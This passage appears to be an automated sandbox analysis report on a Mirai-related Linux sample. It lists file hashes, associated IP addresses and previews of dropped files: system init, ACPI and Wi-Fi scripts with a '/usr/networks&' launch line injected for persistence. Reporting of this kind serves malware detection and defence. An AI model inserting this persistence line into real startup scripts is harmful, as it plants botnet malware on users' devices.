                                              jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                              • 181.231.109.204
                                              arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 190.195.213.10
                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 190.228.155.119
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                              • 190.230.208.103
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              /etc/init.d/S95baby.shbin.sh.elfGet hashmaliciousMiraiBrowse
                                                na.elfGet hashmaliciousMiraiBrowse
                                                  bin.sh.elfGet hashmaliciousMiraiBrowse
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                      bin.shGet hashmaliciousMiraiBrowse
                                                        bin.shGet hashmaliciousMiraiBrowse
                                                          3aakN9FzA5Get hashmaliciousGafgyt MiraiBrowse
                                                            Mozi.m.3Get hashmaliciousMiraiBrowse
                                                              ZFvtIZszMdGet hashmaliciousMiraiBrowse
                                                                bin.shGet hashmaliciousMiraiBrowse
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):5.2904323771702915
                                                                  Encrypted:false
                                                                  SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                  MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                  SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                  SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                  SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):157
                                                                  Entropy (8bit):4.412729940630044
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                  MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                  SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                  SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                  SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):636
                                                                  Entropy (8bit):4.722087767454589
                                                                  Encrypted:false
                                                                  SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                  MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                  SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                  SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                  SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):483
                                                                  Entropy (8bit):4.215331622973397
                                                                  Encrypted:false
                                                                  SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                  MD5:07889D65619CDB80F8E876A087F160D3
                                                                  SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                  SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                  SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):266
                                                                  Entropy (8bit):4.77497394042067
                                                                  Encrypted:false
                                                                  SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                  MD5:5E3A15E41D35EC409613236A20B5783E
                                                                  SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                  SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                  SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):297
                                                                  Entropy (8bit):4.680424868813
                                                                  Encrypted:false
                                                                  SSDEEP:6:aJGzAuCuzHB/unOJufu+/ugEWR+V18yjPn:aJcvzHBmnO4G7gEWQ18yTn
                                                                  MD5:10400BA156D6BC78E67D90A86A2906D4
                                                                  SHA1:D4D7BA30B85ABA9FC08EC0C990651601128B2A74
                                                                  SHA-256:D348A8461FB9190DCBD6CF35575B2C4799E04AA4E359EA921F8723C9FDAA457A
                                                                  SHA-512:25B5C137961E10987A0BBF19AD7CCABC865A7DF7325D3C7B0B0C9BBDB68D5C4470B012A720FA43B707705ACB8FD8DD834AF3DCF7AEA3284A5587EC3E9212E9B3
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 0.fi.kbd_mode '-u' < '/dev/tty1' .kbd_mode '-u' < '/dev/tty2' .kbd_mode '-u' < '/dev/tty3' .kbd_mode '-u' < '/dev/tty4' .kbd_mode '-u' < '/dev/tty5' .kbd_mode '-u' < '/dev/tty6' .loadkeys '/etc/console-setup/cached_UTF-8_del.kmap.gz' > '/dev/null' ../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:POSIX shell script, ASCII text executable
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):3.8936606896881854
                                                                  Encrypted:false
                                                                  SSDEEP:3:TKH4v0VJ:hK
                                                                  MD5:1B3235BA10FC04836C941D3D27301956
                                                                  SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                  SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                  SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: bin.sh.elf, Detection: malicious, Browse
                                                                  • Filename: na.elf, Detection: malicious, Browse
                                                                  • Filename: bin.sh.elf, Detection: malicious, Browse
                                                                  • Filename: na.elf, Detection: malicious, Browse
                                                                  • Filename: bin.sh, Detection: malicious, Browse
                                                                  • Filename: bin.sh, Detection: malicious, Browse
                                                                  • Filename: 3aakN9FzA5, Detection: malicious, Browse
                                                                  • Filename: Mozi.m.3, Detection: malicious, Browse
                                                                  • Filename: ZFvtIZszMd, Detection: malicious, Browse
                                                                  • Filename: bin.sh, Detection: malicious, Browse
                                                                  Preview:#!/bin/sh./usr/networks&.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):85
                                                                  Entropy (8bit):3.542211979287425
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
                                                                  MD5:C0EB4B74AA083DE0731C7411490F5680
                                                                  SHA1:91FE8A766B188646A140A0272D115A4E98F5587B
                                                                  SHA-256:B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
                                                                  SHA-512:4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
                                                                  Malicious:true
                                                                  Preview:./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):85
                                                                  Entropy (8bit):3.542211979287425
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
                                                                  MD5:C0EB4B74AA083DE0731C7411490F5680
                                                                  SHA1:91FE8A766B188646A140A0272D115A4E98F5587B
                                                                  SHA-256:B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
                                                                  SHA-512:4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
                                                                  Malicious:true
                                                                  Preview:./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:true
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:POSIX shell script, ASCII text executable
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):3.8936606896881854
                                                                  Encrypted:false
                                                                  SSDEEP:3:TKH4v0VJ:hK
                                                                  MD5:1B3235BA10FC04836C941D3D27301956
                                                                  SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                  SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                  SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:#!/bin/sh./usr/networks&.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):714
                                                                  Entropy (8bit):5.329653855555143
                                                                  Encrypted:false
                                                                  SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                  MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                  SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                  SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                  SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3368
                                                                  Entropy (8bit):5.3288648372922625
                                                                  Encrypted:false
                                                                  SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                  MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                  SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                  SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                  SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):173
                                                                  Entropy (8bit):4.908121595120361
                                                                  Encrypted:false
                                                                  SSDEEP:3:x/HKRb+NWzBMSKtbUNNQSf9xO4NRzfqiQKaHunjbzAWCTTnQMN+d/L+Xqg3KN0:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+M
                                                                  MD5:1021E0B7B7DE44145038C705865F9FF2
